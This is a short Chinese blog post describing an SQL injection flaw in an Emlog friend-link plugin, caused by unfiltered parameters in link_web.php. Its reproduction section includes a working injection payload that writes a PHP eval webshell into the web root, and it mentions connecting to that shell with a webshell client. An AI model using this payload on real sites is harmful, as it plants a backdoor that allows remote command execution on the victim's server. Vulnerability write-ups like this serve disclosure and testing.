Emlog漏洞——————Emlog友情連結自助外掛存在SQL注入漏洞
阿新 • • 發佈:2018-12-31
Emlog簡介
Emlog是“Every Memory Log”的簡介,意即:點滴記憶。它是一款基於PHP語言哈MYSQL資料庫的開源、免費、功能強大的個人或多人聯合撰寫的部落格系統(Blog)。基於PHP和MYSQL的功能強大的部落格以及CMS建站系統。致力於提供快速、穩定,且在使用上又及其簡單、舒適的部落格服務。安裝和使用都非常方便。目前Emlog正在受到越來越多的廣大使用者的青睞。
漏洞簡介
漏洞簡要概括:
Emlog友情連結自助外掛開的的主要目的是為了減輕友情連結的稽核工作,通過申請者自己填寫表單的方式提交申請,之後通過在後臺檢查申請者的網站是否存在,如果存在則將該連結資料加入資料庫,否則不新增。
存在漏洞的外掛下載地址:https://pan.baidu.com/s/1fRRZ4HIhdUH9S36pU2BA6w
在該外掛當中的link_web.php檔案中,直接將使用者提交的資料進行了拼接,之後直接帶入了查詢,未經過任何的過濾操作,由此一個典型的SQL注入漏洞就這樣簡易的誕生了:
漏洞復現
由於這裡的引數都沒有經過過濾,所以我們可以對任意引數進行驗證,進行SQL注入,首先我們可以提交正常的訪問請求,之後使用burpsuite進行抓包,之後改包,我們這裡以URL為例:
在抓取到資料包之後,我們可以將url改為以下內容:
之後,這條語句會正常執行,同時也會在C:\phpstudy\www\下生成一個shell.php,而且該shell.php中的內容正是我們之前寫入的一句話,之後我們可以使用菜刀進行連線。url=http://www.dyboy.cn' union select 1,2,3,4,5,'<?php eval($_GET[cmd]); ?>' into outfile 'c:\\phpstudy\\www\\shell.php'
由於過於簡單,這裡就不再多做演示了,有興趣的人可以根據本博主上面給出的連線,下載該外掛到本地之後進行測試。